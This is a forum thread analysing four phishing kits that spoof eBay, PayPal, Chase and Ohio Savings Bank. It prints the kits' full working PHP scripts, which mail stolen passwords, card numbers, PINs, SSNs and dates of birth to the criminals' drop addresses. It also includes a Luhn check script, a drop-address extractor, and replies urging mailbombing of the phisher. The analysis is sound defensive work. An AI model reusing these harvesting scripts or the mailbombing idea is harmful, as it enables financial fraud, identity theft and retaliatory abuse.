MGD

Anatomy of a quadruple Phish: Ebay, Paypal, Chase & OSB

Pic 1 - Pic 7: screenshots referenced in the text below (images not reproduced here)
A Phish Pharm

I first ran across this multi-tasking criminal from an eBay phish spam. While digging around the eBay phish (Pic 1), I also located a Chase Bank phish on the same server in Venezuela (Pic 2). I then found the phisher's uploads, which showed that he had 3 phish payloads there (Pic 3). In addition to the eBay (aw-cgi) and the Chase Bank (chaseonline) phishes, there was a third payload (account) which turned out to be Ohio Savings Bank. The OSB does not appear to have an active directory (yet); however, it would look like this partial template from his file (Pic 4).

After working on extracting the drop box information, I then went back the next day to see if the Ohio bank had been activated yet. It had not; however, he had now added a fourth phish and activated it (pp/) (Pic 7). It was a PayPal phish (Pic 5). That "this page has been removed" line is a typical phish tactic. It is a ruse to get you to click on the "Click here to go to our main page" link, which then triggers a JavaScript that adjusts your browser and overlays a URL location of the real PayPal site, to further confirm that you are at the "real site"; see (Pic 6).

Info from this four pack phish:

1) The data drop on the Ohio Savings Bank goes to: ebaysp4m@yahoo.com showing a From: "Ohio Savings cc@ohiqsavings.com"

2) The data drop for the Ebay phish is in two parts, first the User ID/Password is sent to ebaysp4m@yahoo.com with a From: "Nene Bun" (---> Romanian), and a Subject: "$userid $pass". The card data is also sent to ebaysp4m@yahoo.com, after the card number passes a validation script.

3) The Chase Bank phish data and the victim's IP address are sent to antibmw@gmail.com with a From: "Chase Login" and a Subject: "$user - $pass". The victim's name, card data, bank account #, SSN, DOB, and ATM PIN are emailed to the same antibmw@gmail.com by complete.php with a From: "Chase Card" and Subject: "$ccnumber".

4) The data from the PayPal phish is emailed to teinvitsapleci@gmail.com with a From: "PP" and a Subject: "PP - ". Included in this data are: name, complete address, SSN, mother's maiden name, DOB, card #, PIN #, CVV2, and IP address, all going to teinvitsapleci@gmail.com.

Ohio Savings Bank Phish:

verify.php
<?
session_start();
$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$name = $_POST['name'];
$address = $_POST['address'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];

$card = $_POST['ccnumber'];
$month = $_POST['month'];
$year = $_POST['year'];
$atm = $_POST['atmpin'];
$email = $_POST['email'];

$ip = getenv("REMOTE_ADDR");

if((!is_numeric($card)) || (strlen($card) != 16) || (!is_numeric($atm)) || (strlen($atm) != 4))
{
header("Location: verify.htm?error=1");
}
else
{
$message="##################################################\n
";
$message=$message."User: $user\n
";
$message=$message."Pass: $pass\n
";
$message=$message."Name: $name\n
";
$message=$message."Address: $address\n
";
$message=$message."City: $city\n
";
$message=$message."State: $state\n
";
$message=$message."Zip: $zip\n
";
$message=$message."Card Number: $card\n
";
$message=$message."Exp: $month/$year\n
";
$message=$message."PIN: $atm\n
";
$message=$message."E-mail: $email\n
";
$message=$message."IP: $ip\n
";
$message=$message."##################################################
";
mail ("ebaysp4m@yahoo.com","$card $month/$year $atm $ip","$message","From: Ohio Savings <cc@ohiqsavings.com>\n");
header("Location: http://www.ohiosavings.com");
}
?>

Ebay Phish:

Many victims do not realize that even if they just enter the user ID and password on the first page of a phish, then see the second page that asks for all the financial data, realize "something is not right" and back out, the user ID and password have already been captured and are on their way to the criminal. As you can see below, the user ID/password is processed by login.php as soon as it is entered. If the victim completes the second page with the cc info, then update.php processes that info separately. The phisher gets two emails:

login.php
<?

session_start();

$userid = $_POST['userid'];
$pass = $_POST['pass'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");

//sending email info here
$subj = "$userid $pass";
$msg = "Username: $userid\nPassword: $pass\nIP: $ip\nDate: $adddate";
$from = "Nene Bun";
if ($userid==""||$pass=="") require ("eBayISAPI_.html");
else{
mail("ebaysp4m@yahoo.com", $subj, $msg, $from);
header("Location:processcard.html");

}
?>

Ebay Phish

Notice how the scumbag records the victim's IP address in the update message as "Punk'd IP".

Update.php
<?php
include("ccval.php");
$ip = getenv("REMOTE_ADDR");
$newCreditCardIssuer=$_POST["newCreditCardIssuer"];
$creditcard=$_POST["creditcard"];
$ccmonth=$_POST["ccmonth"];
$ccyear=$_POST["ccyear"];
$cvv=$_POST["cvv"];
$pin=$_POST["pin"];
$message="--------------------------------------------------\n";
$message=$message."Punk'd IP: $ip\n";
$message=$message."Credit Card Type: $newCreditCardIssuer\n";
$message=$message."Credit Card Number: $creditcard\n";
$message=$message."Expiration Date: $ccmonth / $ccyear\n";
$message=$message."CVV: $cvv\n";
$message=$message."PIN: $pin\n";
$Result = ccval($creditcard, $newCreditCardIssuer);
if (strlen($cvv)<3||$Result!=1||$pin==""||$ccmonth=="00"||$ccyear=="0000") require("includeerror.html");
else {

mail("ebaysp4m@yahoo.com", "$creditcard $pin $cvv", $message);
require("processcard2.html");
}
?>

Notice the card validation script listed above, ccval.php, that runs the card before writing the data. For those of you who like to load up phishes with bogus data: you need to use numbers that pass the Luhn formula, or the fake data will never get to cram the phisher's box. It is a commonly used script among phishers; you can tell if it is active by the rejection warning. (I have included the code from the phish at the end.) Some sites that load up phishes with fake data do not address this issue, and the fake data is just discarded.

Chase Bank Phish:

The Chase phish operates the same as the Ebay Phish with the User ID/Password processed as soon as they are entered by login.php. The cc data is processed by

login.php
<?php
$user = $_POST['user'];
$pass = $_POST['pass'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");

$msg = "IP: $ip\n$adddate\n\n Username: $user\nPassword: $pass";

$to="antibmw@gmail.com";

$subj = "$user - $pass";
$from = "Chase Login";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}

header("Location: update.htm");

?>

Chase Bank

complete.php
<?php
$ccname = $_POST['name'];
$ccnumber = $_POST['cc'];
$cvv2 = $_POST['cvv2'];
$account = $_POST['account'];
$ssn = $_POST['ssn'];
$ccmonth = $_POST['ccmonth'];
$ccyear = $_POST['ccyear'];
$dday = $_POST['dday'];
$dmonth = $_POST['dmonth'];
$dyear = $_POST['dyear'];
$pin = $_POST['pin'];
$ip = getenv("REMOTE_ADDR");
$adddate=date("D M d, Y g:i a");

$msg = "IP: $ip\n$adddate\n\n CC name: $ccname\nCC Number: $ccnumber\nCVV2: $cvv2\nAccount Number: $account\nSSN: $ssn\nDOB: $dday-$dmonth-$dyear\nCC Month: $ccmonth\nCC year : $ccyear\nPIN: $pin";

$to="antibmw@gmail.com";

$subj = "$ccnumber";
$from = "Chase Card";
$arr=array($to, $message);
foreach ($arr as $to)
{
mail ($to, $subj, $msg, $from);
}

header("Location: http://www.chase.com/cm/cs?pagename=Chase/Href&urlname=chase/cc/terms");

?>

Paypal Phish:

update.php
<?php
session_start();
function _GetParam($Nume, $Default = "") {
if ( isset($_GET[$Nume]) )
return $_GET[$Nume];
else if ( isset($_POST[$Nume]) )
return $_POST[$Nume];
else
return $Default;
}

$ip = getenv("REMOTE_ADDR");
$adddate = date("D M d, Y g:i a");
//sending email info here

$ccnum = _GetParam("ccnum");
$ccmonth = _GetParam("ccmonth");
$ccyear = _GetParam("ccyear");
$pin = _GetParam("pin");
$cvv2 = _GetParam("cvv2");
$fname = _GetParam("fname");
$address = _GetParam("address");
$city = _GetParam("city");
$state = _GetParam("state");
$zip = _GetParam("zip");
$country = _GetParam("country");
$ssn1 = _GetParam("ssn1");
$ssn2 = _GetParam("ssn2");
$ssn3 = _GetParam("ssn3");
$mmn = _GetParam("mmn");
$dob = _GetParam("dob");

$dates = date("d/m/Y - H:i:s");
$browser = $_SERVER['HTTP_USER_AGENT'];
$from = "From: PP ";
$subject = "PP - ".$ccnum." | ".$ccmonth."-".$ccyear." | ".$pin." | ".$ip."";

$mesaj = '
PP Card Number: '.$ccnum.'
PP Expiration Date: '.$ccmonth.'-'.$ccyear.'
PP PIN: '.$pin.'
PP CVV2: '.$cvv2.'
PP Name: '.$fname.'
PP Address: '.$address.'
PP City: '.$city.'
PP State: '.$state.'
PP Zip: '.$zip.'
PP Country: '.$country.'
PP SSN: '.$ssn1.'-'.$ssn2.'-'.$ssn3.'
PP Mother: '.$mmn.'
PP DOB: '.$dob.'
IP: '.$ip.'
Browser used: '.$browser.'
Date and time: "'.$dates.' Central Time (US & Canada)
';

mail("teinvitsapleci@gmail.com", $subject, $mesaj);

?>

I have smudged the phish location as it is still active, and the phish upload packages are relatively easy to find. Not that the pre-made phishes are hard to come by; however, I do not want to expand the current library of any phishers by pointing them there. If anyone is verifiable and needs them for analysis, IM me.

Card validation script:
ccval.php
<?php
/************************************************************************
*
* CCVal - Credit Card Validation function.
*
* Copyright (c) 1999, 2003 Holotech Enterprises. All rights reserved.
* You may freely modify and use this function for your own purposes. You
* may freely distribute it, without modification and with this notice
* and entire header intact.
*
* This function accepts a credit card number and, optionally, a code for
* a credit card name. If a Name code is specified, the number is checked
* against card-specific criteria, then validated with the Luhn Mod 10
* formula. Otherwise it is only checked against the formula. Valid name
* codes are:
*
* mcd - Master Card
* vis - Visa
* amx - American Express
* dsc - Discover
* dnc - Diners Club
* jcb - JCB
* swi - Switch
* dlt - Delta
* enr - EnRoute
*
* You can also optionally specify an expiration date in the formay mmyy.
* If the validation fails on the date, the function returns 0. If it
* fails on the number validation, it returns false.
*
* A description of the criteria used in this function can be found at
* http://www.paylib.net/ccval.html. If you have any questions or
* comments, please direct them to ccval@holotech.net
*
* Alan Little
* Holotech Enterprises
* http://www.holotech.net/
* August 2003
*
************************************************************************/

function CCVal($Num, $Name = "n/a", $Exp = "") {

// Check the expiration date first
if (strlen($Exp)) {
$Month = substr($Exp, 0, 2);
$Year = substr($Exp, -2);

$WorkDate = "$Month/01/$Year";
$WorkDate = strtotime($WorkDate);
$LastDay = date("t", $WorkDate);

$Expires = strtotime("$Month/$LastDay/$Year 11:59:59");
if ($Expires < time()) return 0;
}

// Innocent until proven guilty
$GoodCard = true;

// Get rid of any non-digits
$Num = ereg_replace("[^0-9]", "", $Num);

// Perform card-specific checks, if applicable
switch ($Name) {

case "mcd" :
$GoodCard = ereg("^5[1-5].{14}$", $Num);
break;

case "vis" :
$GoodCard = ereg("^4.{15}$|^4.{12}$", $Num);
break;

case "amx" :
$GoodCard = ereg("^3[47].{13}$", $Num);
break;

case "dsc" :
$GoodCard = ereg("^6011.{12}$", $Num);
break;

case "dnc" :
$GoodCard = ereg("^30[0-5].{11}$|^3[68].{12}$", $Num);
break;

case "jcb" :
$GoodCard = ereg("^3.{15}$|^2131|1800.{11}$", $Num);
break;

case "dlt" :
$GoodCard = ereg("^4.{15}$", $Num);
break;

case "swi" :
$GoodCard = ereg("^[456].{15}$|^[456].{17,18}$", $Num);
break;

case "enr" :
$GoodCard = ereg("^2014.{11}$|^2149.{11}$", $Num);
break;
}

// The Luhn formula works right to left, so reverse the number.
$Num = strrev($Num);

$Total = 0;

for ($x=0; $x<strlen($Num); $x++) {
$digit = substr($Num,$x,1);

// If it's an odd digit, double it
if ($x/2 != floor($x/2)) {
$digit *= 2;

// If the result is two digits, add them
if (strlen($digit) == 2)
$digit = substr($digit,0,1) + substr($digit,1,1);
}

// Add the current digit, doubled and added if applicable, to the Total
$Total += $digit;
}

// If it passed (or bypassed) the card-specific check and the Total is
// evenly divisible by 10, it's cool!
if ($GoodCard && $Total % 10 == 0) return true; else return false;
}
?>

MGD

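Pulling the drop-box details out of a kit like the ones above (recipient, subject template and From header of every mail() call, plus the full address list for the abuse report) can be automated. This is an added Python example written for this thread, not MGD's code or the phisher's; the two kit files in it are constructed, cut-down versions of the verify.php and Chase login.php quoted above, with only the mail-related lines kept.

```python
import re

# Constructed sample: two stripped-down kit files modelled on the ones quoted in the
# post (not the actual files from the server; only the drop-box lines are reproduced).
SAMPLE_KIT = {
    "account/verify.php": r'''<?
$ip = getenv("REMOTE_ADDR");
mail ("ebaysp4m@yahoo.com","$card $month/$year $atm $ip","$message","From: Ohio Savings <cc@ohiqsavings.com>\n");
?>''',
    "chaseonline/login.php": r'''<?php
$to="antibmw@gmail.com";
$subj = "$user - $pass";
$from = "Chase Login";
mail ($to, $subj, $msg, $from);
?>''',
}

# One-line string assignments such as $to="x"; (used to resolve variables passed to mail())
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*(["\'])([^"\'\n]*)\2\s*;')
# The argument list of each mail() call, up to the closing ");"
MAIL_RE = re.compile(r'\bmail\s*\((.*?)\)\s*;', re.S)
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')

def resolve(expr, literals):
    """Turn a mail() argument into text: strip quotes, or look up a $variable."""
    expr = expr.strip()
    if len(expr) >= 2 and expr[0] in "\"'" and expr[-1] == expr[0]:
        return expr[1:-1]
    if expr.startswith("$"):
        return literals.get(expr[1:], expr)  # unknown variables stay symbolic
    return expr

def drop_boxes(kit):
    """For every mail() call: (file, recipient, subject template, extra headers or '')."""
    findings = []
    for path, src in kit.items():
        literals = {name: value for name, _, value in ASSIGN_RE.findall(src)}
        for call in MAIL_RE.finditer(src):
            args = [resolve(a, literals) for a in call.group(1).split(",")]
            headers = args[3] if len(args) > 3 else ""
            findings.append((path, args[0], args[1], headers))
    return findings

def drop_addresses(kit):
    """Every e-mail address hard-coded anywhere in the kit, for the abuse report."""
    return sorted({addr for src in kit.values() for addr in EMAIL_RE.findall(src)})

if __name__ == "__main__":
    for path, to, subject, headers in drop_boxes(SAMPLE_KIT):
        print(f"{path}: to={to!r} subject={subject!r} headers={headers!r}")
    print("report these:", ", ".join(drop_addresses(SAMPLE_KIT)))
```

The Chase file shows why the raw fourth argument is worth printing: "Chase Login" is not a valid header line, so what the kit author meant as a From name is simply passed through as-is.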


Snowy
Mahalo for the excellent analysis/breakdown of the "inner workings" of these scams. It's as good a tutorial as I've seen. The ebaysp4m@yahoo.com email address was sent to yahoo last week along with the source code of the post action asking that they terminate the account for obvious reasons. I didn't hear back from them but assumed the address had been terminated. Seeing your thread today I decided to send an email to ebaysp4m@yahoo.com fully expecting it to bounceback to the yahoo address it was sent from. Nope, no bounceback. What the heck is Yahoo's problem?
Failing any action by Yahoo, knowing the correct subject, formatting etc. of the emails, one could mailbomb the acct with useless data or sign it up with some "Spam To Da Max" mailer & let scum deal with scum. That would be like killing 2 birds with one stone.


catseyenu
Let's see if we can get some special care for this address...


Death2U
Wait I found the correct addy by checking more carefully. Oh he is going to be spam bombed. Disregard the previous edited post.


s0tet
Nice job with the detail. This thread is a saver for note taking on phishing.

Unfortunately, I have seen this too often as well: if you go into a phish folder and no index page exists and the file listing option is enabled on the server, you can often see other phishing folders spoofing other payment organizations. Usually I see 3 or 4 at a pop.

What is more discouraging, and has occurred more often within the past year (2005-06), is when you go to a phishing URL and you are prompted to download a virus or trojan.